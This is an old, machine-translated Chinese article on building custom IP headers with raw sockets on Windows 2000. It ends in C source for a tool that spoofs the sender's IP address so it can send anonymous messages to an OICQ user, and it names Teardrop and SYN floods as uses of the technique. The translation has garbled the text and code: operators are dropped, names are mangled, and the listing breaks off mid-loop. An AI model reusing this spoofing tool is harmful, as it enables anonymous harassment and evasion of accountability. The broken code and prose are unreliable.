Implementation of User Custom IP Headers in WIN2000 and OICQsend Full Exemplar

Lonely swordsman

E-mail: Janker@371.net homepage: http://janker.126.com

First, the primer

Not long ago, I wrote a "personal Internet user self-protection manual", in detail, in detail, how to build a secure personal system and need to pay attention to problems when surfing online, etc., aimed to help The majority of Internet users learn to protect themselves online. Among them, I have mentioned the IP hidden problem, because the object of the article is mainly for general online users, so there is no detailed introduction, I didn't expect many netizens to be very interested, and I have a letter to discuss, so I've been close to this article, dedicated everyone.

Second, IP head structure

We know that all TCP / IP network data is all transmitted on the IP packet in the IP packet, which is packaged to establish an IP datagram containing IP headers and data. In general, network software always generates IP headers with multiple 32-bit words, even if IP headers must be filled with additional 0. The IP header contains all necessary information for transmitting the package data in the IP packet. The data structure and description of the IP header are as follows:

Members Length (BIT) describes the version number of the Version4ip head, is currently IPv4, the latest is the length of the IPv6Header Length4ip header, if there is no special choice, IP header is always 20-byte long Type of Service8 service type, defines the priority of data transmission , Delay, throughput, and reliability, TOTAL PACKET LENGTH16IP package, if there is no special option, generally 20-byte long Identification16ip package identifier, the host uses it uniquely determines each sending datagram FLAG3IP data segmentation flag fragment offset13ip data Segmentation Offset Time TO Live8 Datasters Survation time on the network, each pass a router, this value minus a protocol8TCP / IP protocol type, such as: ICMP is 1, IGMP is 2, TCP is 6, UDP is 17, etc. Header Checksum16 Head Check and Source IP Address32 Source IP Address Destination IP Address32 Destination IP Address Other? Other Other Options Data? Data

Implementing your own defined IP head is a very meaningful thing, for example, by changing the priority and TTL of TOS in the IP head, you can make your own data package with stronger transmission capabilities and life, by modifying IP headers The source IP address can hide the IP address of your machine, and the like. The famous attack program "Teardrop" is implemented by deliberately manufacturing a slice IP package that cannot be handled by the system, and SYN FLOODER and UDP FLOODER are deceived by generating random source IP.

Third, the principle of implementation

In general, custom IP headers are implemented by using Socket's library function setsockopt () option ip_hdrincl, although it is easy to implement on UNIX and Linux platforms, but unfortunately, Winsock1.1 and Winsock2 in Windows platforms. .0 function library setsockopt () does not support IP_HDRINCL options, so in Windows 9x / NT is unable to implement IP header from the WINSOCK library, of course, can be implemented by writing a virtual device driver, but it is more complicated, but The emergence of Windows 2000 breaks this situation, and Windows2000's Winsock 2.2 library fully supports setsockopt () option ip_hdrincl so that we can easily implement custom IP headers. The implementation method is as follows:

Socket S;

Bool Bopt;

S = WSASOCKET (AF_INET, SOCK_RAW, IPPROTO_UDP, NULL, 0, WSA_FLAG_OVERLAPPED); RET = setsockopt (s, ipproto_ip, ip_hdrincl, (char *) Bopt, Sizeof (Bopt);

Fourth, instance

To help everyone learn to construct your IP header data as soon as possible, give a complete example, the functionality of the example is: Just give the other party IP address, you can send it to the other party OICQ a "Hello!" Message, and due to The IP header that sent the packet was modified, which fully implemented the sender IP address hidden, which means that you can make a complete anonymous OICQ sender, of course, if it is intentional, the consequences . The source code is as follows:

/ ************************************************** ********************* /

/ * OICQSEND.C * /

/ * This program compiled with Visual C 6.0 in Windows 2000 Advanced Server debugging via * /

/ * created by janker@371.net 2000.8.28 * /

/ * Declaration: This procedure may generate an aggressive arbitrarily modified to attack programs at your own risk * /

/ ************************************************** ********************* /

#pragma pack (1) #define Win32_Lean_and_mean #include #include #include #include #include #define OICQ_MAX_PACKET 1024 # Define oicq_max_msg 512 # define oicq_msg_len 45 # define src_ip "127.0.0.1" #define src_port 5277 # define dst_port 4000typedef struct ip_hdr {unsigned char ip_verlen; unsigned char ip_tos; unsigned short ip_totallength; unsigned short ip_id; unsigned short ip_offset; unsigned char ip_ttl; unsigned char ip_protocol; unsigned short ip_checksum; unsigned int ip_srcaddr; unsigned int ip_destaddr;} ip_hdr; typedef struct udp_hdr {unsigned short src_portno; unsigned short dst_portno; unsigned short udp_length; unsigned short udp_checksum;} udp_hdr; char strmessage [oicq_msg_len] = {0x02, 0x01, 0x07, 0x00, 0x78, 0x00, 0x00, 0x31, 0x30, 0x30, 0x30, 0x1f, 0x30, 0x30, 0x1f, 0x32, 0x30, 0x30, 0 x 30, 0x2d, 0x30, 0 x 31, 0x2d, 0x30, 0x31, 0x1f, 0x30, 0x30, 0x3a, 0x30, 0x30, 0x1f, 0x68, 0x65, 0x6c, 0x6c, 0x6f, 0x21, 0x03}; Ushort Checksum (USHORT * BUFFER , int size) {unsigned long cksum = 0; while (size> 1) {cksum = * buffer ; size - = sizeof (ushort);} if (size) {cksum = * (uchar *) buffer;} CKSUM = (CKSUM >> 16) (CKSUM & 0xFFFF); CKSUM = (CKSUM >> 16); return (~ cksum);} int main (int Argc, char ** argv) {WSADATA WSD; SOCKET s; bool bopt; struct sockaddr_in remote; ip_hdr iphdr; udp_hdr udphdr; int ret; dword i; unsigned short itotalsize, iudpsize, iudpchecksumsize, iipversion, iipsize, cksum = 0; char buf [oicq_max_packet], * ptr = null; printf ( "Spoof OICQ MSG Sender - by Janker@371.NET/N/N"); if (argc! = 2) {Printf ("usage: oicqsend decination_ip_address);

EXITPROCESS (1);} SRAND TIME (NULL)); StrMessage [5] = rand (); if (WsaStartup (MakeWord (2, 2), & WSD)! = 0) {Printf ("WsaStartup () FAILED:% D / N ", getLastError ()); return -1;} s = wsasocket (AF_INET, SOCK_RAW, IPPROTO_UDP, NULL, 0, 0); if (s == invalid_socket) {Printf (" WSASocket () Failed :% d / n ", wsagetlasterror ()); return -1;} Bopt = true; RET = setsockopt (s, ipproto_ip, ip_hdrincl, (char *) & bopt, sizeof (bopt)); if (Ret == Socket_ERROR) {printf ( "setsockopt (ip_hdrincl) failed:% d / n", wsagetlasterror ()); return -1;} itotalsize = sizeof (iphdr) sizeof (udphdr) oicq_msg_len; iipversion = 4; iipsize = sizeof (iphdr) / sizeof (unsigned long); iphdr.ip_verlen = (iipversion << 4) | iipsize; iphdr.ip_tos = 0; iphdr.ip_totallength = htons (itotalsize); iphdr.ip_id = 0; iphdr.ip_offset = 0; iphdr.ip_ttl = 128; iphdr.ip_protocol = 0x11; iphdr.ip_checksum = 0; iphdr.ip_srcaddr = inet_addr (src_ip); iphdr.ip_destaddr = inet_addr (argv [1]); iudpsize = sizeof (udphdr) oicq_msg_len; udphdr.src_portno = htons (SRC_PORT); UDPHD r.dst_portno = htons (dst_port); udphdr.udp_length = htons (iudpsize); udphdr.udp_checksum = 0; iudpchecksumsize = 0; ptr = buf; zeromemory (buf, oicq_max_packet); memcpy (ptr, & iphdr.ip_srcaddr, sizeof (iphdr .ip_srcaddr)); ptr = sizeof (iphdr.ip_srcaddr); iudpchecksumsize = sizeof (iphdr.ip_srcaddr); memcpy (ptr, & iphdr.ip_destaddr, sizeof (iphdr.ip_destaddr)); ptr = sizeof (iphdr.ip_destaddr) Iudpchecksumsize = sizeof (iPhdr.ip_destaddr); PTR ; Iudpchecksumsize = 1; Memcpy (PTR, & iPhdr.ip_Protocol, Sizeof (iPhdr.ip_protocol);

ptr = sizeof (iphdr.ip_protocol); iudpchecksumsize = sizeof (iphdr.ip_protocol); memcpy (ptr, & udphdr.udp_length, sizeof (udphdr.udp_length)); ptr = sizeof (udphdr.udp_length); iudpchecksumsize = sizeof (udphdr.udp_length); memcpy (ptr, & udphdr, sizeof (udphdr)); ptr = sizeof (udphdr); iudpchecksumsize = sizeof (udphdr); for (i = 0; i

Five, after

The instance OICQ data of this article is based on the "Network Monitor" of Windows 2000, which is a good network packet analysis tool, I hope everyone can use it.

bibliography:

"NetWork Programming for Microsoft Windows Author: Jim Ohlund, Microsoft Press.